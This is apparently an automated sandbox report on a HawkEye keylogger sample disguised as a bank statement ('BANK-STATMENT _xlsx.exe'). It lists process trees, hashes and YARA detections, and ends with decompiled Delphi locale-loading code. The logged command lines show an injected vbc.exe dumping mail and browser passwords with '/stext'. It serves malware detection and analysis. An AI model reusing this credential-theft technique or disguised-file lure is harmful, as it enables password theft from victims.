                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:03:41
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4240 5772140
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:03:44
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2304
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:16:03:52
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:03:53
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.857805866.0000000003A31000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.857805866.0000000003A31000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:03:54
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 1548 5785125
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:03:59
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2288
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:16:04:02
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                              Imagebase:0x400000
                                                                              File size:1171592 bytes
                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000019.00000002.833212497.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              General

                                                                              Start time:16:04:02
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                              Imagebase:0x400000
                                                                              File size:1171592 bytes
                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              General

                                                                              Start time:16:04:17
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:04:18
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.885749429.0000000002F48000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.886068587.0000000003AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001D.00000002.886068587.0000000003AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:04:19
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 6180 5810484
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:04:23
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2264
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:16:04:30
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:04:30
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:04:31
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 5580 5822718
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:04:37
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2324
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:16:04:43
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:

                                                                              General

                                                                              Start time:16:04:44
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000002.932871258.0000000002F3A000.00000004.00000001.sdmp, Author: Joe Security

                                                                              General

                                                                              Start time:16:04:45
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 2864 5836578
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi

                                                                              Disassembly

                                                                              Code Analysis

                                                                                Executed Functions

                                                                                C-Code - Quality: 65%
                                                                                			E00405C78(intOrPtr __eax) {
                                                                                				intOrPtr _v8;
                                                                                				void* _v12;
                                                                                				char _v15;
                                                                                				char _v17;
                                                                                				char _v18;
                                                                                				char _v22;
                                                                                				int _v28;
                                                                                				char _v289;
                                                                                				long _t44;
                                                                                				long _t61;
                                                                                				long _t63;
                                                                                				CHAR* _t70;
                                                                                				CHAR* _t72;
                                                                                				struct HINSTANCE__* _t78;
                                                                                				struct HINSTANCE__* _t84;
                                                                                				char* _t94;
                                                                                				void* _t95;
                                                                                				intOrPtr _t99;
                                                                                				struct HINSTANCE__* _t107;
                                                                                				void* _t110;
                                                                                				void* _t112;
                                                                                				intOrPtr _t113;
                                                                                
                                                                                				_t110 = _t112;
                                                                                				_t113 = _t112 + 0xfffffee0;
                                                                                				_v8 = __eax;
                                                                                				GetModuleFileNameA(0,  &_v289, 0x105);
                                                                                				_v22 = 0;
                                                                                				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                				if(_t44 == 0) {
                                                                                					L3:
                                                                                					_push(_t110);
                                                                                					_push(0x405d7d);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t113;
                                                                                					_v28 = 5;
                                                                                					E00405AC0( &_v289, 0x105);
                                                                                					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405EE4, 0, 0,  &_v22,  &_v28) != 0) {
                                                                                						_v22 = 0;
                                                                                					}
                                                                                					_v18 = 0;
                                                                                					_pop(_t99);
                                                                                					 *[fs:eax] = _t99;
                                                                                					_push(E00405D84);
                                                                                					return RegCloseKey(_v12);
                                                                                				} else {
                                                                                					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                					if(_t61 == 0) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                						if(_t63 != 0) {
                                                                                							_push(0x105);
                                                                                							_push(_v8);
                                                                                							_push( &_v289);
                                                                                							L00401310();
                                                                                							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                                                                							_t107 = 0;
                                                                                							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                                								_t70 =  &_v289;
                                                                                								_push(_t70);
                                                                                								L00401318();
                                                                                								_t94 = _t70 +  &_v289;
                                                                                								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                                                                									_t94 = _t94 - 1;
                                                                                								}
                                                                                								_t72 =  &_v289;
                                                                                								if(_t94 != _t72) {
                                                                                									_t95 = _t94 + 1;
                                                                                									if(_v22 != 0) {
                                                                                										_push(0x105 - _t95 - _t72);
                                                                                										_push( &_v22);
                                                                                										_push(_t95);
                                                                                										L00401310();
                                                                                										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                                                                									}
                                                                                									if(_t107 == 0 && _v17 != 0) {
                                                                                										_push(0x105 - _t95 -  &_v289);
                                                                                										_push( &_v17);
                                                                                										_push(_t95);
                                                                                										L00401310();
                                                                                										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                										_t107 = _t78;
                                                                                										if(_t107 == 0) {
                                                                                											_v15 = 0;
                                                                                											_push(0x105 - _t95 -  &_v289);
                                                                                											_push( &_v17);
                                                                                											_push(_t95);
                                                                                											L00401310();
                                                                                											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                											_t107 = _t84;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							return _t107;
                                                                                						} else {
                                                                                							goto L3;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}


























                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?), ref: 00405C94
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
